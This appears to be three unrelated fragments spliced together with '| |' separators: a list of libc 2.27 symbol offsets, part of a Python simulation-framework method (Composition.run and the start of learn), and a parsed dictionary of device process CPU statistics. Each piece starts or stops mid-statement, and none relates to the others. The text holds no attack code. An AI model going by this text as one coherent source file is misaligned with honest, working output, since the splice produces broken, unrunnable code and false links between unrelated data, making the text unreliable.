(0x20d1fa0, 0, 'mktime', 'libc_2_27'),
(0x20d1fa0, 0, 'timelocal', 'libc_2_27'),
(0x20d2980, 0, 'time', 'libc_2_27'),
(0x20d2a60, 0, '__gettimeofday', 'libc_2_27'),
(0x20d2a60, 0, 'gettimeofday', 'libc_2_27'),
(0x20d2b10, 0, 'settimeofday', 'libc_2_27'),
(0x20d2b40, 0, 'adjtime', 'libc_2_27'),
(0x20d4080, 0, 'tzset', 'libc_2_27'),
(0x20d5e20, 0, 'getitimer', 'libc_2_27'),
(0x20d5e50, 0, 'setitimer', 'libc_2_27'),
(0x20d5e80, 0, 'stime', 'libc_2_27'),
(0x20d5ef0, 0, 'dysize', 'libc_2_27'),
(0x20d5f40, 0, 'timegm', 'libc_2_27'),
(0x20d5f60, 0, 'ftime', 'libc_2_27'),
(0x20d6010, 0, 'getdate_r', 'libc_2_27'),
(0x20d6730, 0, 'getdate', 'libc_2_27'),
(0x20d6770, 0, 'strptime', 'libc_2_27'),
(0x20d9dd0, 0, 'strptime_l', 'libc_2_27'),
(0x20d9de0, 0, 'strftime', 'libc_2_27'),
(0x20d9df0, 0, 'wcsftime', 'libc_2_27'),
(0x20dc240, 0, '__strftime_l', 'libc_2_27'),
(0x20dc240, 0, 'strftime_l', 'libc_2_27'),
(0x20ded50, 0, '__wcsftime_l', 'libc_2_27'),
(0x20ded50, 0, 'wcsftime_l', 'libc_2_27'),
(0x20ded90, 0, 'timespec_get', 'libc_2_27'),
(0x20df690, 0, 'ntp_gettime', 'libc_2_27'),
(0x20df700, 0, 'ntp_gettimex', 'libc_2_27'),
(0x20df920, 0, 'opendir', 'libc_2_27'),
(0x20dfbb0, 0, 'closedir', 'libc_2_27'),
(0x20dfbe0, 0, 'readdir', 'libc_2_27'),
(0x20dfbe0, 0, 'readdir64', 'libc_2_27'),
(0x20dfce0, 0, 'readdir64_r', 'libc_2_27'),
(0x20dfce0, 0, 'readdir_r', 'libc_2_27'),
(0x20dfef0, 0, 'rewinddir', 'libc_2_27'),
(0x20dff80, 0, 'seekdir', 'libc_2_27'),
(0x20e0010, 0, 'telldir', 'libc_2_27'),
(0x20e0020, 0, 'scandir', 'libc_2_27'),
(0x20e0020, 0, 'scandir64', 'libc_2_27'),
(0x20e0050, 0, 'alphasort', 'libc_2_27'),
(0x20e0050, 0, 'alphasort64', 'libc_2_27'),
(0x20e0070, 0, 'versionsort', 'libc_2_27'),
(0x20e0070, 0, 'versionsort64', 'libc_2_27'),
(0x20e0120, 0, 'dirfd', 'libc_2_27'),
(0x20e0130, 0, 'fdopendir', 'libc_2_27'),
(0x20e01f0, 0, 'scandirat', 'libc_2_27'),
(0x20e01f0, 0, 'scandirat64', 'libc_2_27'),
(0x20e0460, 0, 'getdirentries', 'libc_2_27'),
(0x20e0460, 0, 'getdirentries64', 'libc_2_27'),
(0x20e04b0, 0, 'fgetgrent', 'libc_2_27'),
(0x20e0c70, 0, 'getgrouplist', 'libc_2_27'),
(0x20e0d40, 0, 'initgroups', 'libc_2_27'),
(0x20e0e40, 0, 'setgroups', 'libc_2_27'),
(0x20e0ed0, 0, 'getgrent', 'libc_2_27'),
(0x20e0f90, 0, 'getgrgid', 'libc_2_27'),
(0x20e1130, 0, 'getgrnam', 'libc_2_27'),
(0x20e12d0, 0, 'putgrent', 'libc_2_27'),
(0x20e15a0, 0, 'setgrent', 'libc_2_27'),
(0x20e1660, 0, 'endgrent', 'libc_2_27'),
(0x20e1730, 0, 'getgrent_r', 'libc_2_27'),
(0x20e1810, 0, 'getgrgid_r', 'libc_2_27'),
(0x20e1cd0, 0, 'getgrnam_r', 'libc_2_27'),
(0x20e21b0, 0, '_nss_files_parse_grent', 'libc_2_27'),
(0x20e24c0, 0, 'fgetgrent_r', 'libc_2_27'),
(0x20e2750, 0, '__copy_grp', 'libc_2_27'),
(0x20e2970, 0, '__merge_grp', 'libc_2_27'),
(0x20e2d30, 0, 'fgetpwent', 'libc_2_27'),
(0x20e2f30, 0, 'getpw', 'libc_2_27'),
(0x20e3010, 0, 'putpwent', 'libc_2_27'),
(0x20e31a0, 0, 'getpwent', 'libc_2_27'),
(0x20e3260, 0, 'getpwnam', 'libc_2_27'),
(0x20e3400, 0, 'getpwuid', 'libc_2_27'),
(0x20e35a0, 0, 'setpwent', 'libc_2_27'),
(0x20e3660, 0, 'endpwent', 'libc_2_27'),
(0x20e3730, 0, 'getpwent_r', 'libc_2_27'),
(0x20e3810, 0, 'getpwnam_r', 'libc_2_27'),
(0x20e3bf0, 0, 'getpwuid_r', 'libc_2_27'),
(0x20e3fc0, 0, '_nss_files_parse_pwent', 'libc_2_27'),
(0x20e42d0, 0, 'fgetpwent_r', 'libc_2_27'),
(0x20e4540, 0, 'uname', 'libc_2_27'),
(0x20e4570, 0, 'times', 'libc_2_27'),
(0x20e45d0, 0, '__wait', 'libc_2_27'),
(0x20e45d0, 0, 'wait', 'libc_2_27'),
(0x20e4670, 0, '__waitpid', 'libc_2_27'),
(0x20e4670, 0, 'waitpid', 'libc_2_27'),
(0x20e4740, 0, 'wait3', 'libc_2_27'),
(0x20e4760, 0, 'wait4', 'libc_2_27'),
(0x20e4790, 0, 'waitid', 'libc_2_27'),
(0x20e4840, 0, 'alarm', 'libc_2_27'),
(0x20e4870, 0, 'sleep', 'libc_2_27'),
(0x20e48e0, 0, 'pause', 'libc_2_27'),
(0x20e4990, 0, '__nanosleep', 'libc_2_27'),
(0x20e4990, 0, 'nanosleep', 'libc_2_27'),
(0x20e4a50, 0, '__fork', 'libc_2_27'),
(0x20e4a50, 0, '__libc_fork', 'libc_2_27'),
(0x20e4a50, 0, 'fork', 'libc_2_27'),
(0x20e4da0, 0, '__libc_vfork', 'libc_2_27'),
(0x20e4da0, 0, '__vfork', 'libc_2_27'),
(0x20e4da0, 0, 'vfork', 'libc_2_27'),
(0x20e4dd0, 0, '_Exit', 'libc_2_27'),
(0x20e4dd0, 0, '_exit', 'libc_2_27'),
(0x20e4e30, 0, 'execve', 'libc_2_27'),
(0x20e4e60, 0, 'fexecve', 'libc_2_27'),
(0x20e4fa0, 0, 'execv', 'libc_2_27'),
(0x20e4fb0, 0, 'execle', 'libc_2_27'),
(0x20e5160, 0, 'execl', 'libc_2_27'),
(0x20e52f0, 0, 'execvp', 'libc_2_27'),
(0x20e5300, 0, 'execlp', 'libc_2_27'),
(0x20e5490, 0, 'execvpe', 'libc_2_27'),
(0x20e58e0, 0, '__getpid', 'libc_2_27'),
(0x20e58e0, 0, 'getpid', 'libc_2_27'),
(0x20e58f0, 0, 'getppid', 'libc_2_27'),
(0x20e5900, 0, 'getuid', 'libc_2_27'),
(0x20e5910, 0, 'geteuid', 'libc_2_27'),
(0x20e5920, 0, 'getgid', 'libc_2_27'),
(0x20e5930, 0, 'getegid', 'libc_2_27'),
(0x20e5940, 0, 'getgroups', 'libc_2_27'),
(0x20e5970, 0, 'setuid', 'libc_2_27'),
(0x20e5a00, 0, 'setgid', 'libc_2_27'),
(0x20e5a90, 0, 'group_member', 'libc_2_27'),
(0x20e5b40, 0, '__getpgid', 'libc_2_27'),
(0x20e5b40, 0, 'getpgid', 'libc_2_27'),
(0x20e5b70, 0, '__setpgid', 'libc_2_27'),
(0x20e5b70, 0, 'setpgid', 'libc_2_27'),
(0x20e5ba0, 0, 'getpgrp', 'libc_2_27'),
(0x20e5bb0, 0, '__bsd_getpgrp', 'libc_2_27'),
(0x20e5bc0, 0, 'setpgrp', 'libc_2_27'),
(0x20e5bd0, 0, 'getsid', 'libc_2_27'),
(0x20e5c00, 0, 'setsid', 'libc_2_27'),
(0x20e5c30, 0, 'getresuid', 'libc_2_27'),
(0x20e5c60, 0, 'getresgid', 'libc_2_27'),
(0x20e5c90, 0, 'setresuid', 'libc_2_27'),
(0x20e5d30, 0, 'setresgid', 'libc_2_27'),
(0x20e6090, 0, 'pathconf', 'libc_2_27'),
(0x20e69f0, 0, '__sysconf', 'libc_2_27'),
(0x20e69f0, 0, 'sysconf', 'libc_2_27'),
(0x20e6dd0, 0, 'fpathconf', 'libc_2_27'),
(0x20e7b00, 0, 'glob', 'libc_2_27'),
(0x20e7b00, 0, 'glob64', 'libc_2_27'),
(0x20e9620, 0, 'globfree', 'libc_2_27'),
(0x20e9620, 0, 'globfree64', 'libc_2_27'),
(0x20e9680, 0, 'glob_pattern_p', 'libc_2_27'),
(0x20ed7a0, 0, 'fnmatch', 'libc_2_27'),
(0x2101120, 0, 're_compile_pattern', 'libc_2_27'),
(0x21011a0, 0, 're_set_syntax', 'libc_2_27'),
(0x21011b0, 0, 're_compile_fastmap', 'libc_2_27'),
(0x2101280, 0, 'regcomp', 'libc_2_27'),
(0x2101440, 0, 'regerror', 'libc_2_27'),
(0x21014d0, 0, 'regfree', 'libc_2_27'),
(0x2101520, 0, 're_comp', 'libc_2_27'),
(0x2101670, 0, 'regexec', 'libc_2_27'),
(0x21017b0, 0, 're_match', 'libc_2_27'),
(0x21017d0, 0, 're_search', 'libc_2_27'),
(0x21017f0, 0, 're_match_2', 'libc_2_27'),
(0x21018f0, 0, 're_search_2', 'libc_2_27'),
(0x21019f0, 0, 're_set_registers', 'libc_2_27'),
(0x2101a30, 0, 're_exec', 'libc_2_27'),
(0x21025a0, 0, 'confstr', 'libc_2_27'),
(0x2103cd0, 0, 'getopt', 'libc_2_27'),
(0x2103cf0, 0, '__posix_getopt', 'libc_2_27'),
(0x2103d10, 0, 'getopt_long', 'libc_2_27'),
(0x2103d50, 0, 'getopt_long_only', 'libc_2_27'),
(0x2103d90, 0, 'sched_setparam', 'libc_2_27'),
(0x2103dc0, 0, '__sched_getparam', 'libc_2_27'),
(0x2103dc0, 0, 'sched_getparam', 'libc_2_27'),
(0x2103df0, 0, '__sched_setscheduler', 'libc_2_27'),
(0x2103df0, 0, 'sched_setscheduler', 'libc_2_27'),
(0x2103e20, 0, '__sched_getscheduler', 'libc_2_27'),
(0x2103e20, 0, 'sched_getscheduler', 'libc_2_27'),
(0x2103e50, 0, '__sched_yield', 'libc_2_27'),
(0x2103e50, 0, 'sched_yield', 'libc_2_27'),
(0x2103e80, 0, '__sched_get_priority_max', 'libc_2_27'),
(0x2103e80, 0, 'sched_get_priority_max', 'libc_2_27'),
(0x2103eb0, 0, '__sched_get_priority_min', 'libc_2_27'),
(0x2103eb0, 0, 'sched_get_priority_min', 'libc_2_27'),
(0x2103ee0, 0, 'sched_rr_get_interval', 'libc_2_27'),
(0x2103f10, 0, 'sched_getaffinity', 'libc_2_27'),
(0x2103f80, 0, 'sched_setaffinity', 'libc_2_27'),
(0x2107bc0, 0, 'getaddrinfo', 'libc_2_27'),
(0x2108880, 0, 'freeaddrinfo', 'libc_2_27'),
(0x21088c0, 0, 'gai_strerror', 'libc_2_27'),
(0x210d2d0, 0, 'wordfree', 'libc_2_27'),
(0x210d340, 0, 'wordexp', 'libc_2_27'),
(0x210e620, 0, '__libc_pread', 'libc_2_27'),
(0x210e620, 0, '__pread64', 'libc_2_27'),
(0x210e620, 0, 'pread', 'libc_2_27'),
(0x210e620, 0, 'pread64', 'libc_2_27'),
(0x210e6d0, 0, '__libc_pwrite', 'libc_2_27'),
(0x210e6d0, 0, '__pwrite64', 'libc_2_27'),
(0x210e6d0, 0, 'pwrite', 'libc_2_27'),
(0x210e6d0, 0, 'pwrite64', 'libc_2_27'),
(0x210e7d0, 0, 'posix_spawn_file_actions_init', 'libc_2_27'),
(0x210e7f0, 0, 'posix_spawn_file_actions_destroy', 'libc_2_27'),
(0x210e860, 0, 'posix_spawn_file_actions_addclose', 'libc_2_27'),
(0x210e8d0, 0, 'posix_spawn_file_actions_addopen', 'libc_2_27'),
(0x210e980, 0, 'posix_spawn_file_actions_adddup2', 'libc_2_27'),
(0x210ea30, 0, 'posix_spawnattr_init', 'libc_2_27'),
(0x210ea60, 0, 'posix_spawnattr_destroy', 'libc_2_27'),
(0x210ea70, 0, 'posix_spawnattr_getsigdefault', 'libc_2_27'),
(0x210eac0, 0, 'posix_spawnattr_setsigdefault', 'libc_2_27'),
(0x210eb10, 0, 'posix_spawnattr_getflags', 'libc_2_27'),
(0x210eb20, 0, 'posix_spawnattr_setflags', 'libc_2_27'),
(0x210eb40, 0, 'posix_spawnattr_getpgroup', 'libc_2_27'),
(0x210eb50, 0, 'posix_spawnattr_setpgroup', 'libc_2_27'),
(0x210eb60, 0, 'posix_spawn', 'libc_2_27'),
(0x210eb70, 0, 'posix_spawnp', 'libc_2_27'),
(0x210f350, 0, 'posix_spawnattr_getsigmask', 'libc_2_27'),
(0x210f3c0, 0, 'posix_spawnattr_getschedpolicy', 'libc_2_27'),
(0x210f3d0, 0, 'posix_spawnattr_getschedparam', 'libc_2_27'),
(0x210f3e0, 0, 'posix_spawnattr_setsigmask', 'libc_2_27'),
(0x210f450, 0, 'posix_spawnattr_setschedpolicy', 'libc_2_27'),
(0x210f470, 0, 'posix_spawnattr_setschedparam', 'libc_2_27'),
(0x210f480, 0, 'posix_madvise', 'libc_2_27'),
(0x210f590, 0, '__sched_cpucount', 'libc_2_27'),
(0x210f5b0, 0, '__sched_cpualloc', 'libc_2_27'),
(0x210f5d0, 0, '__sched_cpufree', 'libc_2_27'),
(0x210f5e0, 0, 'sched_getcpu', 'libc_2_27'),
(0x210f690, 0, 'utime', 'libc_2_27'),
(0x210f6c0, 0, 'mkfifo', 'libc_2_27'),
(0x210f710, 0, 'mkfifoat', 'libc_2_27'),
(0x210f760, 0, '__xstat', 'libc_2_27'),
(0x210f760, 0, '__xstat64', 'libc_2_27'),
(0x210f7b0, 0, '__fxstat', 'libc_2_27'),
(0x210f7b0, 0, '__fxstat64', 'libc_2_27'),
(0x210f800, 0, '__lxstat', 'libc_2_27'),
(0x210f800, 0, '__lxstat64', 'libc_2_27'),
(0x210f850, 0, '__xmknod', 'libc_2_27'),
(0x210f8b0, 0, '__xmknodat', 'libc_2_27'),
(0x210f910, 0, '__fxstatat', 'libc_2_27'),
(0x210f910, 0, '__fxstatat64', 'libc_2_27'),
(0x210f970, 0, '__statfs', 'libc_2_27'),
(0x210f970, 0, 'statfs', 'libc_2_27'),
(0x210f970, 0, 'statfs64', 'libc_2_27'),
(0x210f9a0, 0, 'fstatfs', 'libc_2_27'),
(0x210f9a0, 0, 'fstatfs64', 'libc_2_27'),
(0x210f9d0, 0, 'statvfs', 'libc_2_27'),
(0x210f9d0, 0, 'statvfs64', 'libc_2_27'),
(0x210fa40, 0, 'fstatvfs', 'libc_2_27'),
(0x210fa40, 0, 'fstatvfs64', 'libc_2_27'),
(0x210fab0, 0, 'umask', 'libc_2_27'),
(0x210fac0, 0, 'chmod', 'libc_2_27'),
(0x210faf0, 0, 'fchmod', 'libc_2_27'),
(0x210fb20, 0, 'lchmod', 'libc_2_27'),
(0x210fb40, 0, 'fchmodat', 'libc_2_27'),
(0x210fbb0, 0, 'mkdir', 'libc_2_27'),
(0x210fbe0, 0, 'mkdirat', 'libc_2_27'),
(0x210fc10, 0, '__open_2', 'libc_2_27'),
(0x210fc40, 0, '__open', 'libc_2_27'),
(0x210fc40, 0, '__open64', 'libc_2_27'),
(0x210fc40, 0, 'open', 'libc_2_27'),
(0x210fc40, 0, 'open64', 'libc_2_27'),
(0x210fd70, 0, '__open_nocancel', 'libc_2_27'),
(0x210fe10, 0, '__open64_2', 'libc_2_27'),
(0x210fe40, 0, '__openat_2', 'libc_2_27'),
(0x210fe70, 0, 'openat', 'libc_2_27'),
(0x210fe70, 0, 'openat64', 'libc_2_27'),
(0x2110040, 0, '__openat64_2', 'libc_2_27'),
(0x2110070, 0, '__read', 'libc_2_27'),
(0x2110070, 0, 'read', 'libc_2_27'),
(0x2110110, 0, '__read_nocancel', 'libc_2_27'),
(0x2110140, 0, '__write', 'libc_2_27'),
(0x2110140, 0, 'write', 'libc_2_27'),
(0x2110210, 0, '__lseek', 'libc_2_27'),
(0x2110210, 0, 'llseek', 'libc_2_27'),
(0x2110210, 0, 'lseek', 'libc_2_27'),
(0x2110210, 0, 'lseek64', 'libc_2_27'),
(0x2110240, 0, 'access', 'libc_2_27'),
(0x2110270, 0, 'eaccess', 'libc_2_27'),
(0x2110270, 0, 'euidaccess', 'libc_2_27'),
(0x21103c0, 0, 'faccessat', 'libc_2_27'),
(0x21105a0, 0, '__fcntl', 'libc_2_27'),
(0x21105a0, 0, 'fcntl', 'libc_2_27'),
(0x2110770, 0, 'flock', 'libc_2_27'),
(0x21107a0, 0, 'lockf', 'libc_2_27'),
(0x21107a0, 0, 'lockf64', 'libc_2_27'),
(0x21108c0, 0, '__close', 'libc_2_27'),
(0x21108c0, 0, 'close', 'libc_2_27'),
(0x2110940, 0, '__close_nocancel', 'libc_2_27'),
(0x2110970, 0, 'dup', 'libc_2_27'),
(0x21109a0, 0, '__dup2', 'libc_2_27'),
(0x21109a0, 0, 'dup2', 'libc_2_27'),
(0x21109d0, 0, 'dup3', 'libc_2_27'),
(0x2110a00, 0, '__pipe', 'libc_2_27'),
(0x2110a00, 0, 'pipe', 'libc_2_27'),
(0x2110a30, 0, 'pipe2', 'libc_2_27'),
(0x2110a60, 0, 'creat', 'libc_2_27'),
(0x2110a60, 0, 'creat64', 'libc_2_27'),
(0x2110af0, 0, 'chdir', 'libc_2_27'),
(0x2110b20, 0, 'fchdir', 'libc_2_27'),
(0x2110b50, 0, 'getcwd', 'libc_2_27'),
(0x2111270, 0, 'getwd', 'libc_2_27'),
(0x2111320, 0, 'get_current_dir_name', 'libc_2_27'),
(0x21113e0, 0, 'chown', 'libc_2_27'),
(0x2111410, 0, 'fchown', 'libc_2_27'),
| |
= ContextFlags.COMPOSITION
# FIX 5/28/20
# context.execution_phase = ContextFlags.PREPARING
# context.replace_flag(ContextFlags.IDLE, ContextFlags.PREPARING)
if scheduler is None:
scheduler = self.scheduler
if termination_processing is None:
termination_processing = self.termination_processing
else:
new_conds = self.termination_processing.copy()
new_conds.update(termination_processing)
termination_processing = new_conds
for node in self.nodes:
num_execs = node.parameters.num_executions._get(context)
if num_execs is None:
node.parameters.num_executions._set(Time(), context)
else:
node.parameters.num_executions._get(context)._set_by_time_scale(TimeScale.RUN, 0)
if ContextFlags.SIMULATION_MODE not in context.runmode:
try:
self.parameters.input_specification._set(copy(inputs), context)
except:
self.parameters.input_specification._set(inputs, context)
# DS 1/7/20: Check to see if any Components are still in deferred init. If so, attempt to initialize them.
# If they can not be initialized, raise a warning.
self._complete_init_of_partially_initialized_nodes(context=context)
if ContextFlags.SIMULATION_MODE not in context.runmode:
self._check_projection_initialization_status()
if not skip_analyze_graph:
self._analyze_graph(context=context)
self._check_for_unnecessary_feedback_projections()
# set auto logging if it's not already set, and if log argument is True
if log:
self.enable_logging()
# Set animation attributes
if animate is True:
animate = {}
self._animate = animate
if self._animate is not False:
self._set_up_animation(context)
# SET UP EXECUTION -----------------------------------------------
results = self.parameters.results._get(context)
if results is None:
results = []
self._assign_execution_ids(context)
scheduler._init_counts(execution_id=context.execution_id)
input_nodes = self.get_nodes_by_role(NodeRole.INPUT)
inputs, num_inputs_sets = self._parse_run_inputs(inputs)
if num_trials is not None:
num_trials = num_trials
else:
num_trials = num_inputs_sets
scheduler._reset_counts_total(TimeScale.RUN, context.execution_id)
# KDM 3/29/19: run the following not only during LLVM Run compilation, due to bug where TimeScale.RUN
# termination condition is checked and no data yet exists. Adds slight overhead as long as run is not
# called repeatedly (this init is repeated in Composition.execute)
# initialize from base context but don't overwrite any values already set for this context
if (not skip_initialization
and (context is None or ContextFlags.SIMULATION_MODE not in context.runmode)):
self._initialize_from_context(context, base_context, override=False)
context.composition = self
if initialize_cycle_values is not None:
self.initialize(values=initialize_cycle_values, include_unspecified_nodes=False, context=context)
if not reset_stateful_functions_to:
reset_stateful_functions_to = {}
for node, vals in reset_stateful_functions_to.items():
try:
iter(vals)
except TypeError:
vals = [vals]
reset_stateful_functions_to[node] = vals
if (isinstance(reset_stateful_functions_when, Never) or
node not in reset_stateful_functions_when) and \
isinstance(node.reset_stateful_function_when, Never):
try:
node.reset(**vals, context=context)
except TypeError:
node.reset(*vals, context=context)
# cache and set reset_stateful_function_when conditions for nodes, matching old System behavior
# Validate
valid_reset_type = True
if not isinstance(reset_stateful_functions_when, (Condition, dict)):
valid_reset_type = False
elif type(reset_stateful_functions_when) == dict:
if False in {True if isinstance(k, Mechanism) and isinstance(v, Condition) else
False for k,v in reset_stateful_functions_when.items()}:
valid_reset_type = False
if not valid_reset_type:
raise CompositionError(
f"{reset_stateful_functions_when} is not a valid specification for reset_integrator_nodes_when of {self.name}. "
"reset_integrator_nodes_when must be a Condition or a dict comprised of {Node: Condition} pairs.")
self._reset_stateful_functions_when_cache = {}
# use type here to avoid another costly call to isinstance
if not type(reset_stateful_functions_when) == dict:
for node in self.nodes:
try:
if isinstance(node.reset_stateful_function_when, Never):
self._reset_stateful_functions_when_cache[node] = node.reset_stateful_function_when
node.reset_stateful_function_when = reset_stateful_functions_when
except AttributeError:
pass
else:
for node in reset_stateful_functions_when:
self._reset_stateful_functions_when_cache[node] = node.reset_stateful_function_when
node.reset_stateful_function_when = reset_stateful_functions_when[node]
is_simulation = (context is not None and
ContextFlags.SIMULATION_MODE in context.runmode)
if (bin_execute is True or str(bin_execute).endswith('Run')):
# There's no mode to run simulations.
# Simulations are run as part of the controller node wrapper.
assert not is_simulation
try:
comp_ex_tags = frozenset({"learning"}) if self._is_learning(context) else frozenset()
if bin_execute is True or bin_execute.startswith('LLVM'):
_comp_ex = pnlvm.CompExecution(self, [context.execution_id], additional_tags=comp_ex_tags)
results += _comp_ex.run(inputs, num_trials, num_inputs_sets)
elif bin_execute.startswith('PTX'):
self.__ptx_initialize(context, additional_tags=comp_ex_tags)
EX = self._compilation_data.ptx_execution._get(context)
results += EX.cuda_run(inputs, num_trials, num_inputs_sets)
# Update the parameter for results
self.parameters.results._set(results, context)
if self._is_learning(context):
# copies back matrix to pnl from param struct (after learning)
_comp_ex._copy_params_to_pnl(context=context)
# KAM added the [-1] index after changing Composition run()
# behavior to return only last trial of run (11/7/18)
self.most_recent_context = context
return results[-1]
except Exception as e:
if bin_execute is not True:
raise e from None
warnings.warn("Failed to run `{}': {}".format(self.name, str(e)))
# Reset gym forager environment for the current trial
if self.env:
trial_output = np.atleast_2d(self.env.reset())
else:
trial_output = None
# Loop over the length of the list of inputs - each input represents a TRIAL
for trial_num in range(num_trials):
# Execute call before trial "hook" (user defined function)
if call_before_trial:
call_with_pruned_args(call_before_trial, context=context)
if termination_processing[TimeScale.RUN].is_satisfied(
scheduler=scheduler,
context=context
):
break
# PROCESSING ------------------------------------------------------------------------
# Prepare stimuli from the outside world -- collect the inputs for this TRIAL and store them in a dict
try:
execution_stimuli = self._parse_trial_inputs(inputs, trial_num)
except StopIteration:
break
# execute processing
# pass along the stimuli for this trial
trial_output = self.execute(inputs=execution_stimuli,
scheduler=scheduler,
termination_processing=termination_processing,
call_before_time_step=call_before_time_step,
call_before_pass=call_before_pass,
call_after_time_step=call_after_time_step,
call_after_pass=call_after_pass,
reset_stateful_functions_to=reset_stateful_functions_to,
context=context,
base_context=base_context,
clamp_input=clamp_input,
runtime_params=runtime_params,
skip_initialization=True,
bin_execute=bin_execute,
)
# ---------------------------------------------------------------------------------
# store the result of this execution in case it will be the final result
# object.results.append(result)
if isinstance(trial_output, collections.abc.Iterable):
result_copy = trial_output.copy()
else:
result_copy = trial_output
if ContextFlags.SIMULATION_MODE not in context.runmode:
results.append(result_copy)
self.parameters.results._set(results, context)
if not self.parameters.retain_old_simulation_data._get():
if self.controller is not None:
# if any other special parameters store simulation info that needs to be cleaned up
# consider dedicating a function to it here
# this will not be caught above because it resides in the base context (context)
if not self.parameters.simulation_results.retain_old_simulation_data:
self.parameters.simulation_results._get(context).clear()
if not self.controller.parameters.simulation_ids.retain_old_simulation_data:
self.controller.parameters.simulation_ids._get(context).clear()
if call_after_trial:
call_with_pruned_args(call_after_trial, context=context)
# IMPLEMENTATION NOTE:
# The AFTER Run controller execution takes place here, because there's no way to tell from within the execute
# method whether or not we are at the last trial of the run.
# The BEFORE Run controller execution takes place in the execute method,, because we can't execute the controller until after
# setup has occurred for the Input CIM.
if (self.controller_mode == AFTER and
self.controller_time_scale == TimeScale.RUN):
try:
_comp_ex
except NameError:
_comp_ex = None
self._execute_controller(
bin_execute=bin_execute,
_comp_ex=_comp_ex,
context=context
)
# Reset input spec for next trial
self.parameters.input_specification._set(None, context)
scheduler.get_clock(context)._increment_time(TimeScale.RUN)
self.most_recent_context = context
if self._animate is not False:
# Save list of gifs in self._animation as movie file
movie_path = self._animation_directory + '/' + self._movie_filename
self._animation[0].save(fp=movie_path,
format='GIF',
save_all=True,
append_images=self._animation[1:],
duration=self._image_duration * 1000,
loop=0)
# print(f'\nSaved movie for {self.name} in {self._animation_directory}/{self._movie_filename}')
print(f"\nSaved movie for '{self.name}' in '{self._movie_filename}'")
if self._show_animation:
movie = Image.open(movie_path)
movie.show()
# Undo override of reset_stateful_function_when conditions
for node in self.nodes:
try:
node.reset_stateful_function_when = self._reset_stateful_functions_when_cache[node]
except KeyError:
pass
return trial_output
@handle_external_context()
def learn(
self,
inputs: dict,
targets: tc.optional(dict) = None,
num_trials: tc.optional(int) = None,
epochs: int = 1,
minibatch_size: int = 1,
patience: tc.optional(int) = None,
min_delta: int = 0,
context: tc.optional(Context) = None,
bin_execute=False,
randomize_minibatches=False,
call_before_minibatch = None,
call_after_minibatch = None,
*args,
**kwargs
):
"""
Runs the composition in learning mode - that is, any components with disable_learning False will be
executed in learning mode. See `Composition_Learning` for details.
Arguments
---------
inputs: {`Node <Composition_Nodes>`:list }
a dictionary containing a key-value pair for each `Node <Composition_Nodes>` (Mechanism or Composition)
in the composition that receives inputs from the user. There are several equally valid ways that this
dict can be structured:
1. For each pair, the key is the and the value is an input, the shape of which must match the Node's
default variable. This is identical to the input dict in the `run <Composition.run>` method
(see `Input Dictionary <Composition_Input_Dictionary>` for additional details).
2. A dict with keys 'inputs', 'targets', and 'epochs'. The `inputs` key stores a dict that is the same
same structure as input specification (1) of learn. The `targets` and `epochs` keys should contain
values of the same shape as `targets <Composition.learn>` and `epochs <Composition.learn>`.
targets: {`Node <Composition_Nodes>`:list }
a dictionary containing a key-value pair for each `Node <Composition_Nodes>` in the Composition that
receives target values as input to the Composition for training `learning pathways
<Composition_Learning_Pathway>`. The key of each entry can be either the `TARGET_MECHANISM
<Composition_Learning_Components>` for a learning pathway or the final Node in that Pathway, and
the value is the target value used for that Node on each trial (see `target inputs
<Composition_Target_Inputs>` for additional details concerning the formatting of targets).
num_trials : int (default=None)
typically, the composition will infer the number of trials from the length of its input specification.
To reuse the same inputs across many trials, you may specify an input dictionary with lists of length 1,
or use default inputs, and select a number of trials with num_trials.
epochs : int (default=1)
specifies the number of | |
'status': 'S'},
'15126': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15127': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15128': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15129': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15130': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15131': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15132': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15133': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15135': {'five_min': '0%',
'five_sec': '0%',
'name': 'rpc.mountd',
'one_min': '0%',
'ppid': 1,
'size': 1789952,
'status': 'S'},
'152': {'five_min': '0%',
'five_sec': '0%',
'name': 'sync_supers',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15337': {'five_min': '0%',
'five_sec': '0%',
'name': 'lsmpi-refill',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15338': {'five_min': '0%',
'five_sec': '0%',
'name': 'lsmpi-xmit',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15339': {'five_min': '0%',
'five_sec': '0%',
'name': 'lsmpi-rx',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'154': {'five_min': '0%',
'five_sec': '0%',
'name': 'bdi-default',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'155': {'five_min': '0%',
'five_sec': '0%',
'name': 'kblockd/0',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'156': {'five_min': '0%',
'five_sec': '0%',
'name': 'kblockd/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'157': {'five_min': '0%',
'five_sec': '0%',
'name': 'kacpid',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15791': {'five_min': '0%',
'five_sec': '0%',
'name': 'ddr_err_monitor',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'158': {'five_min': '0%',
'five_sec': '0%',
'name': 'kacpi_notify',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15806': {'five_min': '0%',
'five_sec': '0%',
'name': 'mtdblockd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'15828': {'five_min': '0%',
